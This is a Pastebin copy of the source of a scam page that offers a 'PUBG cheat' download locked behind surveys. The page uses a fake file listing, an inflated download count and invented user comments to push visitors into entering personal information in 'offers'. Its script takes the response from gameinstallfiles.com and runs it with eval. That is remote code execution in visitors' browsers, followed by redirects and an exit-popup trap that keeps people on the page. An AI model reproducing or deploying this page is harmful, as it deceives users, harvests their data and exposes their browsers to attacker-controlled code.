Advertisement
Guest User

Untitled

a guest
Nov 22nd, 2017
865
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 48.39 KB | None | 0 0
  1. <html lang="en" style="height:100%;">
  2. <head>
  3. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  4. <meta name="googlebot" content="noindex">
  5. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>
  6. <script type="text/javascript" src="https://gameinstallfiles.com/jquery.tipsy.js"></script>
  7. <link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.0-rc1/css/bootstrap.min.css">
  8. <link rel="stylesheet" href="//gameinstallfiles.com/bootstrap3/css/bootstrap-glyphicons.css">
  9. <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
  10. <link rel="icon" href="/favicon.ico" type="image/x-icon">
  11. <script language="JavaScript">
  12. $(function() {
  13. $('.tip_over_link').tipsy({offset: -3,gravity: 'w',fade: false,html: true,opacity: 0.95});
  14. });
  15. var timed_function;
  16.  
  17. function Start_Ajax(){
  18. clearTimeout(timed_function);
  19. $('#offerlst').hide();
  20. $('#offerwait').show();
  21. timed_function = setTimeout("chkld();",20000);
  22. }
  23. function Back_Ajax(){
  24. $('#offerwait').hide();
  25. $('#offerlst').fadeIn('slow');
  26. }
  27. function chkld(){
  28. $.ajax({
  29. type: "POST",
  30. crossDomain: true,
  31. data: "a_t=86400&lid=717414",
  32. url: "https://gameinstallfiles.com/common/ajax_check_url.php",
  33. success: function(msg){
  34. eval(msg);
  35. }
  36. });
  37. }
  38. function completed(url){
  39. top.location = url;
  40. }
  41. </script>
  42. <link href='https://fonts.googleapis.com/css?family=Lato' rel='stylesheet' type='text/css'>
  43. <style>
  44. /* ===== Tipsy ===== */
  45.  
  46. .tipsy { padding: 4px; font-size: 11px; position: absolute; z-index: 100000; }
  47.  
  48. .tipsy-inner { padding: 5px 7px 5px 8px; background-color: black; color: white; max-width: 300px; text-align: center; }
  49. .tipsy-inner { border-radius: 3px; -moz-border-radius:3px; -webkit-border-radius:3px; }
  50. .tipsy-arrow { position: absolute; background: url('https://gameinstallfiles.com/images/tipsy.gif') no-repeat top left; width: 9px; height: 5px; }
  51. .tipsy-w { margin-left: 5px; }
  52. .tipsy-w .tipsy-arrow { top: 50%; margin-top: -4px; left: 0; width: 5px; height: 9px; }
  53.  
  54. body{
  55. background-color:white;
  56. font-size: 14px;
  57. }
  58.  
  59. .offerlst{
  60.  
  61. background-color:rgba(239,239,239,0.5);
  62.  
  63. border:1px solid white;
  64. padding:20px;
  65. border-radius:8px;
  66.  
  67. min-height: 80px;
  68. margin-bottom: 8px;
  69. font-size: 16px;
  70. }
  71. .link_a, .link_a:link{
  72.  
  73.  
  74. background-color: #F5F5F5;
  75. background-image: linear-gradient(to bottom, #FFFFFF, #E6E6E6);
  76. background-repeat: repeat-x;
  77. border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) #B3B3B3;
  78. border-image: none;
  79. border-radius: 4px 4px 4px 4px;
  80. border-style: solid;
  81. border-width: 1px;
  82. box-shadow: 0 1px 0 rgba(255, 255, 255, 0.2) inset, 0 1px 2px rgba(0, 0, 0, 0.05);
  83. color: #333333;
  84. cursor: pointer;
  85. display: inline-block;
  86. font-size: 14px;
  87. line-height: 20px;
  88. margin-bottom: 0;
  89. padding: 4px 12px;
  90. text-align: center;
  91. text-shadow: 0 1px 1px rgba(255, 255, 255, 0.75);
  92. vertical-align: middle;
  93.  
  94. font-weight: normal;
  95. text-decoration:none;
  96.  
  97.  
  98.  
  99. }
  100.  
  101. .link_a:hover{
  102. background-position: 0 -15px;
  103. transition: background-position 0.1s linear 0s;
  104. }
  105. .each_p_elm{
  106. margin: 3px 0;
  107.  
  108. padding: 3px;
  109. white-space:nowrap;
  110. }
  111.  
  112. html
  113. {
  114. height:auto!important;
  115. }
  116. body
  117. {
  118. font-family: 'Roboto', sans-serif;
  119. background-image: url('/assets/images/bgcopy.jpg');
  120. background-repeat:no-repeat;
  121. background-size: cover;
  122. background-position: center center;
  123. }
  124. .main
  125. {
  126. max-width: 870px;
  127. margin: 0 auto;
  128. padding-left: 45px;
  129. padding-right: 45px;
  130. background-color: #f8fcff;
  131. box-shadow: 0px 0px 3px #cacaca;
  132. background-image: url('/assets/images/container-bgcopy.jpg');
  133. background-size: cover;
  134. background-position: center;
  135. }
  136. .header
  137. {
  138. text-align: center;
  139. padding-top: 30px;
  140. text-align: center;
  141. padding-left:4%;
  142. padding-right:4%;
  143. padding-bottom: 30px;
  144. font-family:400;
  145. font-size:24px;
  146. color:#535353;
  147. text-transform:uppercase;
  148. }
  149. .header img
  150. {
  151. max-width: 100%;
  152. margin-right:10px;
  153. }
  154. .clearfix
  155. {
  156. clear: both;
  157. }
  158. .jumbotron
  159. {
  160. background: transparent;
  161. padding-top: 30px;
  162. padding-bottom: 40px;
  163. border-bottom: 1px solid #dcdcdc;
  164. padding-left:0px;
  165. padding-right:0px;
  166. }
  167. .jumbotron-left
  168. {
  169. width: 50%;
  170. float: left;
  171. }
  172. .jumbotron-right
  173. {
  174. width: 47%;
  175. margin-left: 3%;
  176. float: left;
  177. text-align: right;
  178. }
  179. .jumbotron-right img
  180. {
  181. max-width: 100%;
  182. }
  183. .file
  184. {
  185. /*border: 2px solid #ffffff;*/
  186. background-color: #56ad89;
  187. border-radius: 5px;
  188. padding: 2%;
  189. }
  190. .file-hero
  191. {
  192. font-weight: 300;
  193. font-size: 30px;
  194. color: #dcdcdc;
  195. text-transform: uppercase;
  196. margin-top: 0px;
  197. margin-bottom: 50px;
  198. border-bottom: 1px solid #dcdcdc;
  199. }
  200. .offer_help_text
  201. {
  202. line-height: normal;
  203. margin-bottom: 5px;
  204. text-align: left;
  205. }
  206. .file-img
  207. {
  208. float: left;
  209. margin-right: 2%;
  210. width: 16%;
  211. }
  212. .file-img img
  213. {
  214. max-width: 100%;
  215. }
  216. .file-text
  217. {
  218. float: left;
  219. width: 82%;
  220. }
  221. .file-name
  222. {
  223. font-weight: 400;
  224. font-size: 18px;
  225. color: #ffffff;
  226. margin-top: 0px;
  227. margin-bottom: 0px;
  228. }
  229. .file-size
  230. {
  231. font-weight: 700;
  232. font-size: 22px;
  233. color: #fff000;
  234. text-transform: uppercase;
  235. margin-top: -5px;
  236. margin-bottom: 0px;
  237. }
  238. .file-value
  239. {
  240. font-weight: 400;
  241. color: #ffffff;
  242. font-size: 12px;
  243. margin-top: 0px;
  244. }
  245. .report-file
  246. {
  247. font-weight: 400;
  248. font-size: 14px;
  249. text-decoration: underline;
  250. color: #15ae67;
  251. margin-top: 0;
  252. margin-bottom: 0;
  253. }
  254. .download-button
  255. {
  256.  
  257. }
  258. .dl_button
  259. {
  260. display: block;
  261. background-color: #ffffff;
  262. font-weight: 700;
  263. font-size: 30px;
  264. color: #3974b1;
  265. text-align: center;
  266. text-transform: uppercase;
  267. padding: 1.5%;
  268. padding-top: 5%;
  269. padding-bottom: 4%;
  270. text-decoration: none;
  271. border-radius: 3px;
  272. border: 2px solid #3974b1;
  273. width: 97%;
  274. cursor: pointer;
  275. /*margin-top: 25px;*/
  276. }
  277. .dl_button:hover
  278. {
  279. background-color: #3974b1;
  280. color: #ffffff;
  281. border: 2px solid #3974b1;
  282. }
  283. .dl_button img
  284. {
  285. vertical-align: middle;
  286. margin-left: 2%;
  287. margin-top: -5px;
  288. }
  289. .hide-div
  290. {
  291.  
  292. }
  293. .show-div
  294. {
  295. margin-top: 20px;
  296. }
  297. .half-content
  298. {
  299. width: 48%;
  300. margin-bottom: 30px;
  301. }
  302. .full-content
  303. {
  304. margin-bottom: 30px;
  305. }
  306. .content
  307. {
  308. width: 100%;
  309. margin-bottom: 10px;
  310. }
  311. .full-button
  312. {
  313. }
  314. .link_a
  315. {
  316. background-image:none!important;
  317. background-color: #ffffff;
  318. display: block;
  319. font-weight: 700;
  320. font-size: 14px!important;
  321. color: #3974b1;
  322. text-align: center;
  323. text-transform: uppercase;
  324. padding: 2%;
  325. text-decoration: none;
  326. border-radius: 5px;
  327. border: 2px solid #3974b1;
  328. width: 96%;
  329. cursor: pointer;
  330. }
  331. .link_a img
  332. {
  333. vertical-align: middle;
  334. margin-left: 1%;
  335. margin-top: -3px;
  336. }
  337. .link_a:hover
  338. {
  339. background-image:none!important;
  340. background-color: #3974b1;
  341. color: #ffffff;
  342. border: 2px solid #3974b1;
  343. }
  344. .content-hero
  345. {
  346. font-weight: 700;
  347. font-size: 22px;
  348. color: #3f3f3f;
  349. margin-top: 0;
  350. margin-bottom: 5px;
  351. text-align: left;
  352. }
  353. .lead
  354. {
  355. font-weight: 300;
  356. font-size: 14px;
  357. color: #3f3f3f;
  358. margin-top: 0;
  359. text-align: left;
  360. }
  361. .services
  362. {
  363. font-weight: 400;
  364. font-size: 11px;
  365. text-align: left;
  366. color: #979797;
  367. }
  368. .services a
  369. {
  370. color: #266166;
  371. text-decoration: none;
  372. }
  373. .steps
  374. {
  375. border-bottom: 1px solid #dcdcdc;
  376. padding-bottom: 50px;
  377. padding-top: 40px;
  378. }
  379. .steps-hero
  380. {
  381. font-weight: 300;
  382. font-size: 30px;
  383. color: #3a3a3a;
  384. text-align: center;
  385. text-transform: uppercase;
  386. margin-top: 0px;
  387. margin-bottom: 25px;
  388. }
  389. .step-section
  390. {
  391. width: 31%;
  392. float: left;
  393. margin-right: 3%;
  394. }
  395. .section-img
  396. {
  397. /* width: 25%;
  398. float: left;
  399. margin-right: 2%;*/
  400. text-align: center;
  401. }
  402. .section-img img
  403. {
  404. max-width: 100%;
  405. }
  406. .section-text
  407. {
  408. /* width: 73%;
  409. margin-top: -7px;
  410. float: left;*/
  411. text-align: center;
  412. }
  413. .section-text-hero
  414. {
  415. font-weight: 100;
  416. font-size: 60px;
  417. /*color: #ffffff;*/
  418. margin-top: 0;
  419. margin-bottom: 0;
  420. line-height: 45px;
  421. }
  422. .section-text-zero
  423. {
  424. font-weight: 400;
  425. font-size: 17px;
  426. color: #5a5a5a;
  427. margin-bottom: 0;
  428. margin-top: 5px;
  429. }
  430. .comments
  431. {
  432. padding-top: 50px;
  433. padding-bottom: 50px;
  434. }
  435. .comment-hero
  436. {
  437. font-weight: 300;
  438. font-size: 26px;
  439. color: #494949;
  440. text-transform: uppercase;
  441. margin-top: 0px;
  442. text-align: center;
  443. }
  444. .comment-section
  445. {
  446. padding-bottom: 25px;
  447. padding-top: 10px;
  448. border-bottom: 1px solid #dcdcdc;
  449. }
  450. .comment-date-name
  451. {
  452. margin-bottom: 5px;
  453. }
  454. .commenter-name
  455. {
  456. font-weight: 300;
  457. font-size: 20px;
  458. color: #494949;
  459. float: left;
  460. text-align: left;
  461. width: 50%;
  462. margin-bottom: 0px;
  463. margin-top: 0;
  464. }
  465. .commenter-date
  466. {
  467. font-weight: 400;
  468. font-size: 12px;
  469. color: #a5a5a5;
  470. float: left;
  471. text-align: right;
  472. width: 50%;
  473. /* position: relative;
  474. top: 20px;*/
  475. }
  476. .commenter-comment
  477. {
  478. font-weight: 400;
  479. font-size: 14px;
  480. color: #8c8c8c;
  481. margin-top: 0;
  482. margin-bottom: 0;
  483. }
  484. .commenter-reply
  485. {
  486. font-weight: 400;
  487. font-size: 12px;
  488. color: #475773;
  489. margin-top: 5px;
  490. margin-bottom: 0;
  491. }
  492. .footer
  493. {
  494. padding-top: 30px;
  495. padding-bottom: 10px;
  496. max-width: 870px;
  497. padding-left: 45px;
  498. padding-right: 45px;
  499. margin: 0 auto;
  500. }
  501. .footer-left
  502. {
  503. width: 50%;
  504. float: left;
  505. text-align: left;
  506. font-weight: 400;
  507. font-size: 12px;
  508. color: #797979;
  509. }
  510. /* .footer-left p
  511. {
  512. margin-top: 0;
  513. margin-bottom: 0;
  514. }*/
  515. .footer-right
  516. {
  517. width: 50%;
  518. float: left;
  519. text-align: right;
  520. margin-top: -7px;
  521. }
  522. .footer-nav
  523. {
  524. padding-left: 0;
  525. }
  526. .footer-nav li
  527. {
  528. font-weight: 400;
  529. font-size: 12px;
  530. color: #797979;
  531. display: inline;
  532. padding-left: 0;
  533. }
  534. .footer-nav li a
  535. {
  536. font-weight: 400;
  537. font-size: 12px;
  538. color: #797979;
  539. }
  540. @media screen and (max-width:980px)
  541. {
  542. .main
  543. {
  544. padding-left: 2%;
  545. padding-right: 2%;
  546. }
  547. .file-name
  548. {
  549. font-size: 18px;
  550. }
  551. .file-size
  552. {
  553. font-size: 22px;
  554. }
  555. .file-value
  556. {
  557. font-size: 12px;
  558. }
  559. .dl_button
  560. {
  561. font-size: 25px;
  562. }
  563. .content-hero
  564. {
  565. font-size: 18px;
  566. }
  567. .link_a
  568. {
  569. font-size: 11px!important;
  570. }
  571. .section-text-hero
  572. {
  573. font-size: 40px;
  574. }
  575. .section-text-zero
  576. {
  577. font-size: 13px;
  578. }
  579. }
  580. @media screen and (max-width:900px)
  581. {
  582. .link_a{
  583. font-size: 10px!important;
  584. }
  585. }
  586. @media screen and (max-width:850px)
  587. {
  588. .link_a
  589. {
  590. width: 96%;
  591. }
  592. .jumbotron-left
  593. {
  594. width: 80%;
  595. margin-left: 10%;
  596. margin-right: 10%;
  597. }
  598. .jumbotron-right
  599. {
  600. margin-top: 25px;
  601. width: 80%;
  602. margin-left: 10%;
  603. margin-right: 10%;
  604. }
  605. .step-section
  606. {
  607. width: 80%;
  608. margin-left: 10%;
  609. margin-right: 10%;
  610. margin-bottom: 25px;
  611. }
  612. .footer-left
  613. {
  614. width: 100%;
  615. text-align: center;
  616. margin-left: 0;
  617. margin-right: 0;
  618. }
  619. .footer-right
  620. {
  621. width: 100%;
  622. text-align: center;
  623. margin-left: 0;
  624. margin-right: 0;
  625. }
  626. .file-hero
  627. {
  628. text-align: center;
  629. }
  630. }
  631. @media screen and (max-width:800px)
  632. {
  633. .steps-hero
  634. {
  635. font-size: 25px;
  636. }
  637. .comment-hero
  638. {
  639. font-size: 23px;
  640. }
  641. .commenter-name
  642. {
  643. font-size: 20px;
  644. }
  645. }
  646. @media screen and (max-width:600px)
  647. {
  648. .offer_help_text
  649. {
  650. font-size:17px;
  651. line-height: 21px;
  652. margin-bottom: 5px;
  653. text-align: left;
  654. }
  655. .link_a
  656. {
  657. font-size: 10px!important;
  658. }
  659. .commenter-comment
  660. {
  661. font-size: 13px;
  662. }
  663. .comment-hero
  664. {
  665. font-size: 20px;
  666. }
  667. .steps-hero
  668. {
  669. font-size: 20px;
  670. }
  671. .link_a img
  672. {
  673. margin-left: 1%;
  674. }
  675. .content-hero
  676. {
  677. font-size: 16px;
  678. text-align: left;
  679. }
  680. .lead
  681. {
  682. font-size: 12px;
  683. text-align: center;
  684. }
  685. .file-name
  686. {
  687. font-size: 14px;
  688. }
  689. .file-size
  690. {
  691. font-size: 20px;
  692. }
  693. .file-value
  694. {
  695. font-size: 11px;
  696. }
  697. .file-text
  698. {
  699. margin-top: 15px;
  700. }
  701.  
  702. @media screen and (max-width:550px)
  703. {
  704. .link_a
  705. {
  706. font-size: 9px!important;
  707. }
  708. .dl_button
  709. {
  710. font-size: 17px;
  711. }
  712. .jumbotron-left {
  713. margin-left: 2.5%;
  714. margin-right: 2.5%;
  715. width: 95%;
  716. }
  717.  
  718. }
  719. @media screen and (max-width:450px)
  720. {
  721. .jumbotron-left
  722. {
  723. width: 95%;
  724. margin-left: 2.5%;
  725. margin-right: 2.5%;
  726. }
  727. .section-text-hero
  728. {
  729. font-size: 30px;
  730. margin-bottom: -7px;
  731. }
  732. .file-text
  733. {
  734. margin-top: 0px;
  735. }
  736. .file-name
  737. {
  738. font-size: 11px;
  739. }
  740. .file-size
  741. {
  742. font-size: 15px;
  743. margin-top: 0px;
  744. }
  745. .link_a img
  746. {
  747. display: none;
  748. }
  749. .header
  750. {
  751. font-size:17px;
  752. }
  753. }
  754. @media screen and (max-width:400px)
  755. {
  756. }
  757. </style>
  758. <title>PUBG CHEAT DOWNLOAD</title>
  759. </head>
  760. <body id="the_body" style="margin:0; height:100%; font-family: 'Lato', sans-serif;">
  761.  
  762. <!--Begin -->
  763.  
  764. <div class="container">
  765. <div class="header">
  766. <img src="assets/images/logo-completecopy2.png" alt='download-logo'/>
  767. FileUnlckr</div>
  768. <div class="main">
  769. <div class="jumbotron">
  770. <p class="file-hero"></p>
  771. <div class="jumbotron-left">
  772. <div class="file">
  773. <div class="file-img">
  774. <img src="assets/images/filecopy.png" alt='file'/>
  775. </div>
  776. <div class="file-text">
  777. <p class="file-name">AccessCodePUBGhackv2.6.txt</p>
  778. <p class="file-size">File size: 302 bytes</p>
  779. <p class="file-value">4,803 Downloads as of today</p>
  780. </div>
  781. <div class="clearfix"></div>
  782. </div>
  783.  
  784. </div>
  785. <div class="jumbotron-right">
  786. <div class="hide-div" id="hide-div">
  787. <center>
  788. <button onclick="$(this).hide(); $('#offerlst').show('slow');" type="button" class="btn btn-danger btn-large dl_button"><i class="glyphicon glyphicon-download-alt"></i> Begin Download</button>
  789. <div id="offerlst" style="display:none;">
  790. <div class="offer_help_text" style="font-weight: bold;">Complete an offer below to continue.</div>
  791. <p class="link_a" style="margin: 2px; ">
  792. Sorry, there are no offers in your region at this time.<br/>
  793. </p>
  794. </div>
  795. <div id="offerwait" style="margin: 50px 0; font-size: 15px; display: none;">
  796. <p style="margin: 2px; ">
  797. <span onclick="Back_Ajax();" style="cursor:pointer;">
  798. <img style="vertical-align: middle;" src="https://gameinstallfiles.com/images/back.png">
  799. <span style="text-decoration: underline; font-weight: bold;">Go Back and try a different offer.</span>
  800. </span><br/>
  801. <img style="vertical-align: middle;" src="https://gameinstallfiles.com/images/search.gif"> Waiting for offer completion..
  802. </p>
  803. </div>
  804. </center>
  805.  
  806. </div>
  807. <p class="services">By downloading or attempting to download you agree to the <a href="#" onclick="$('#link_terms').show('fast');">Terms</a></p>
  808. </div>
  809.  
  810. <div class="clearfix"></div>
  811. </div>
  812. <div class="steps">
  813. <p class="steps-hero">How it works</p>
  814. <div class="step-section">
  815. <div class="section-img">
  816. <img src="assets/images/surveucopy.png" alt='survey'/>
  817. </div>
  818. <div class="section-text">
  819. <p class="section-text-zero">Input all your valid information in the survey!</p>
  820. </div>
  821. </div>
  822. <div class="step-section">
  823. <div class="section-img">
  824. <img src="assets/images/unlockcopy.png" alt='unlock'/>
  825. </div>
  826. <div class="section-text">
  827. <p class="section-text-zero">Once completed, the download will unlock automatically!</p>
  828. </div>
  829. </div>
  830. <div class="step-section" style="margin-right:0;">
  831. <div class="section-img">
  832. <img src="assets/images/startcopy.png" alt='start'/>
  833. </div>
  834. <div class="section-text">
  835. <p class="section-text-zero">Your download will then start!</p>
  836. </div>
  837. <div class="clearfix"></div>
  838. </div>
  839. <div class="clearfix"></div>
  840. </div>
  841. <div class="comments">
  842. <p class="comment-hero">
  843. Please complete an offer before you leave comments.
  844. </p>
  845. <div class="comment-section">
  846. <div class="comment-date-name">
  847. <p class="commenter-name">
  848. Dastier
  849. </p>
  850. <p class="commenter-date">
  851. Nov 22nd, 2017
  852. </p>
  853. <div class="clearfix"></div>
  854. </div>
  855. <p class="commenter-comment">
  856. thanks alot duude! xD i can finally chicken dinner now! more power!
  857. </p>
  858. <p class="commenter-reply">
  859. Reply
  860. </p>
  861. </div>
  862. <div class="comment-section">
  863. <div class="comment-date-name">
  864. <p class="commenter-name">
  865. PUBGking </p>
  866. <p class="commenter-date">
  867. Nov 22nd, 2017
  868. </p>
  869. <div class="clearfix"></div>
  870. </div>
  871. <p class="commenter-comment">
  872. Thanks you very much 100% good!!
  873. </p>
  874. <p class="commenter-reply">
  875. Reply
  876. </p>
  877. </div>
  878. <div class="comment-section">
  879. <div class="comment-date-name">
  880. <p class="commenter-name">
  881. Shrood
  882. </p>
  883. <p class="commenter-date">
  884. Nov 22nd, 2017
  885. </p>
  886. <div class="clearfix"></div>
  887. </div>
  888. <p class="commenter-comment">
  889. i just logged out my youtube, so i'll just comment here... at first i thought this was fake! LMAO finally got it to download.. thanks man! using it now
  890. </p>
  891. <p class="commenter-reply">
  892. Reply
  893. </p>
  894. </div>
  895. <div class="comment-section">
  896. <div class="comment-date-name">
  897. <p class="commenter-name">
  898. XiJinHung
  899. </p>
  900. <p class="commenter-date">
  901. Nov 21st, 2017
  902. </p>
  903. <div class="clearfix"></div>
  904. </div>
  905. <p class="commenter-comment">
  906. 谢谢你很棒
  907. </p>
  908. <p class="commenter-reply">
  909. Reply
  910. </p>
  911. </div>
  912. </div>
  913. <div class="footer">
  914. <div class="footer-left">
  915. <p>Copyright 2014 downupfiles.com</p>
  916. </div>
  917. <div class="footer-right">
  918. <ul class="footer-nav">
  919. <li>
  920. <a href="#" onclick="$('#link_terms').show('fast');">Terms</a>
  921. </li>
  922. <li>
  923. |
  924. </li>
  925. <li>
  926. <a href="#" onclick="$('#link_privacy').show('fast');">Privacy</a>
  927. </li>
  928. <li>
  929. |
  930. </li>
  931. <li>
  932. <a href="#" onclick="$('#link_dmca').show('fast');">DMCA</a>
  933. </li>
  934. </ul>
  935. </div>
  936. <div class="clearfix"></div>
  937. </div>
  938. </div>
  939. <!--End -->
  940.  
  941. <div id="link_terms" title="Terms" style="z-index: 9; display:none; width:50%; position:absolute; left: 25px; top:20px; overflow: visible !important;">
  942. <div style="font-size:11px; position: relative; padding:5px; background-color:white; color:black; border:2px solid black; border-radius: 5px;">
  943. <center><button onclick="$('#link_terms').hide('fast');">Close Window</button></center>
  944. <br/>
  945. <br/>
  946. <strong>Terms and Conditions of Use</strong><br/>
  947. By accessing this site, you agree to be bound by these Terms and Conditions of Use, all applicable laws and regulations, and agree that you are responsible for compliance with any applicable local laws. If you do not agree with any of these terms, you are prohibited from using or accessing this site. The materials contained in this web site are protected by applicable copyright and trade mark laws.
  948. <br/>
  949. <br/>
  950. Permission is granted to temporarily download one copy of the materials (information or software) on this site for personal, non-commercial viewing only. This is the grant of a license, not a transfer of title, and under this license you may not:
  951. <br/>
  952. modify or copy the materials;<br/>
  953. use the materials for any commercial purpose, or for any public display (commercial or non-commercial);<br/>
  954. attempt to decompile or reverse engineer any software contained on this site;<br/>
  955. remove any copyright or other proprietary notations from the materials; or
  956. transfer the materials to another person or "mirror" the materials on any other server.<br/>
  957. This license shall automatically terminate if you violate any of these restrictions and may be terminated by site at any time. Upon terminating your viewing of these materials or upon the termination of this license, you must destroy any downloaded materials in your possession whether in electronic or printed format.
  958. <br/>
  959. <br/>
  960. Disclaimer:<br/>
  961. The materials on this site are provided "as is". this site makes no warranties, expressed or implied, and hereby disclaims and negates all other warranties, including without limitation, implied warranties or conditions of merchantability, or non-infringement of intellectual property or other violation of rights. Further, this site does not warrant or make any representations concerning the accuracy, likely results, or reliability of the use of the materials on its Internet web site or otherwise relating to such materials or on any sites linked to this site.
  962. <br/>
  963. <br/>
  964. Limitations:<br/>
  965. In no event shall this site or its suppliers be liable for any damages (including, without limitation, damages for loss of data or profit, or due to business interruption,) arising out of the use or inability to use the materials on this site, even if this site or an authorized representative has been notified orally or in writing of the possibility of such damage. Because some jurisdictions do not allow limitations on implied warranties, or limitations of liability for consequential or incidental damages, these limitations may not apply to you.
  966. <br/>
  967. <br/>
  968. Revisions:<br/>
  969. The materials appearing on this site could include technical, typographical, or photographic errors. this site does not warrant that any of the materials on its web site are accurate, complete, or current. this site may make changes to the materials contained on its web site at any time without notice. this site does not, however, make any commitment to update the materials.
  970. <br/>
  971. <br/>
  972. Links:<br/>
  973. this site has not reviewed all of the sites linked to its Internet web site and is not responsible for the contents of any such linked site. The inclusion of any link does not imply endorsement by this site. Use of any such linked web site is at the user's own risk.
  974. <br/>
  975. <br/>
  976. Terms of Use Modifications:<br/>
  977. This site may revise these terms of use for its web site at any time without notice. By using this web site you are agreeing to be bound by the then current version of these Terms and Conditions of Use.
  978. <br/><br/>
  979. Governing Law:<br/>
  980. Any claim relating to this site shall be governed by the laws of the State of Nevada without regard to its conflict of law provisions.
  981. <br/><br/>
  982. <center><button onclick="$('#link_terms').hide('fast');">Close Window</button></center>
  983. </div>
  984. </div>
  985. <div id="link_privacy" title="Privacy" style="z-index: 9; display:none; width:50%; position:absolute; left: 25px; top:20px; overflow: visible !important;">
  986. <div style="font-size:11px; position: relative; padding:5px; background-color:white; color:black; border:2px solid black; border-radius: 5px;">
  987. <center><button onclick="$('#link_privacy').hide('fast');">Close Window</button></center>
  988. <br/>
  989. <br/>
  990. <strong>Privacy Policy</strong><br/>
  991. <br/>
  992. Your privacy is important to us. Accordingly, we have developed this Policy in order for you to understand how we collect, use, communicate and disclose and make use of your personal information. The following outlines our privacy policy.
  993. <br/>
  994. Before or at the time of collecting personal information, we will identify the purposes for which information is being collected.<br/>
  995. We will collect and use personal information solely with the objective of fulfilling those purposes specified by us and for other compatible purposes, unless we obtain the consent of the individual concerned or as required by law.<br/>
  996. We will only retain personal information as long as necessary for the fulfillment of those purposes.<br/>
  997. We will collect personal information by lawful and fair means and, where appropriate, with the knowledge or consent of the individual concerned.<br/>
  998. Personal data should be relevant to the purposes for which it is to be used, and, to the extent necessary for those purposes, should be accurate, complete, and up-to-date.<br/>
  999. We will protect personal information by reasonable security safeguards against loss or theft, as well as unauthorized access, disclosure, copying, use or modification.<br/>
  1000. We will make readily available to customers information about our policies and practices relating to the management of personal information.<br/>
  1001. We are committed to conducting our business in accordance with these principles in order to ensure that the confidentiality of personal information is protected and maintained.
  1002. <br/><br/>
  1003. <center><button onclick="$('#link_privacy').hide('fast');">Close Window</button></center>
  1004. </div>
  1005. </div>
  1006. <div id="link_dmca" title="DMCA" style="z-index: 9; display:none; width:50%; position:absolute; left: 25px; top:20px; overflow: visible !important;">
  1007. <div style="font-size:11px; position: relative; padding:5px; background-color:white; color:black; border:2px solid black; border-radius: 5px;">
  1008. <center><button onclick="$('#link_dmca').hide('fast');">Close Window</button></center>
  1009. <br/>
  1010. <br/>
  1011. <strong>DMCA &amp; Compliance Policy</strong><br/><br/>
  1012. <strong>We do not host any files or content on our servers</strong>! Please report copyright infringment in accordance with the details below:
  1013. <br/><br/>
  1014. It is our policy to respond to notices of alleged infringement that comply with the Digital Millennium Copyright Act and other applicable intellectual property laws. Responses may include removing or disabling access to material claimed to be the subject of infringing activity and/or terminating subscribers. If we remove or disable access in response to such a notice, we will make a good-faith attempt to contact the owner or administrator of the affected site or content so that they may make a counter notification pursuant to sections 512(g)(2) and (3) of that Act. It is our policy to document all notices of alleged infringement on which we act.
  1015. <br/><br/>
  1016. To file a notice of infringement with us, you must provide a digital notification via email that sets forth the items specified below. Please note that you may be liable for damages (including costs and attorneys' fees) if you materially misrepresent that a product or activity is infringing your copyrights. Accordingly, if you are not sure whether material available online infringes your copyright, we suggest that you first contact an attorney.
  1017. <br/><br/>
  1018. Your communication must include substantially all of the following:
  1019. <br/><br/>
  1020. A physical or electronic signature of a person authorized to act on behalf of the owner of an exclusive right that is allegedly infringed.<br/>
  1021. Identify in sufficient detail the location of copyrighted work that you believe has been infringed upon or other information sufficient to specify the copyrighted work being infringed. If multiple copyrighted works at a single online site are covered by a single notification, a representative list of such works at that site.<br/>
  1022. Identification of the material that is claimed to be infringing or to be the subject of infringing activity and that is to be removed or access to which is to be disabled, and information reasonably sufficient to permit us to locate the material.<br/>
  1023. Information reasonably sufficient to permit us to contact the complaining party, such as an address, telephone number, and, if available, an electronic mail address at which the complaining party may be contacted.<br/>
  1024. The following statement: "I have a good faith belief that use of the material in the manner complained of is not authorized by the copyright owner, its agent, or the law."<br/>
  1025. The following statement: "I swear, under penalty of perjury, that the information in the notification is accurate, and that I am the copyright owner or am authorized to act on behalf of the owner of an exclusive right that is allegedly infringed."<br/>
  1026. Please contact us to report any misleading advertising, fake content, SPAM, copyright infringement, or other abuse.
  1027. <br/><br/>
  1028. <center><button onclick="$('#link_dmca').hide('fast');">Close Window</button></center>
  1029. </div>
  1030. </div>
  1031.  
  1032. <script type="text/javascript">
  1033. var jquery_loaded = true;
  1034. var bypass = false;
  1035.  
  1036. var exit_ready = false;
  1037. function load_slidepage(){
  1038. if(exit_ready==false){
  1039. exit_ready = true;
  1040. jQuery('#the_box').html('');
  1041. jQuery('#the_box').animate({
  1042. height: '0px'
  1043. }, 500, function() {
  1044. jQuery('#main_div').hide();
  1045. jQuery('#main_back').hide();
  1046.  
  1047. });
  1048. }
  1049. }
  1050.  
  1051. setTimeout('griplock()',1000);
  1052.  
  1053. function griplock(){
  1054. if(jquery_loaded){
  1055.  
  1056. var exitsplashmessage = 'Click Stay on this Page';
  1057. var exitsplashpage = 'https://gameinstallfiles.com/welcome?pub=134192';
  1058.  
  1059. jQuery(document).ready(function(){
  1060.  
  1061. function addLoadEvent(func) {
  1062. var oldonload = window.onload;
  1063. if ( typeof window.onload != 'function') {
  1064. window.onload = func;
  1065. } else {
  1066. window.onload = function() {
  1067. if (oldonload) {
  1068. oldonload();
  1069. }
  1070. func();
  1071. }
  1072. }
  1073. }
  1074.  
  1075. function addClickEvent(a, i, func) {
  1076. if ( typeof a[i].onclick != 'function') {
  1077. a[i].onclick = func;
  1078. }
  1079. }
  1080.  
  1081.  
  1082. var the_html = '<div id="main_div" style="display:block; width:100%; height:100%; position:absolute; z-index:2;">';
  1083. if(jQuery.browser.mozilla){
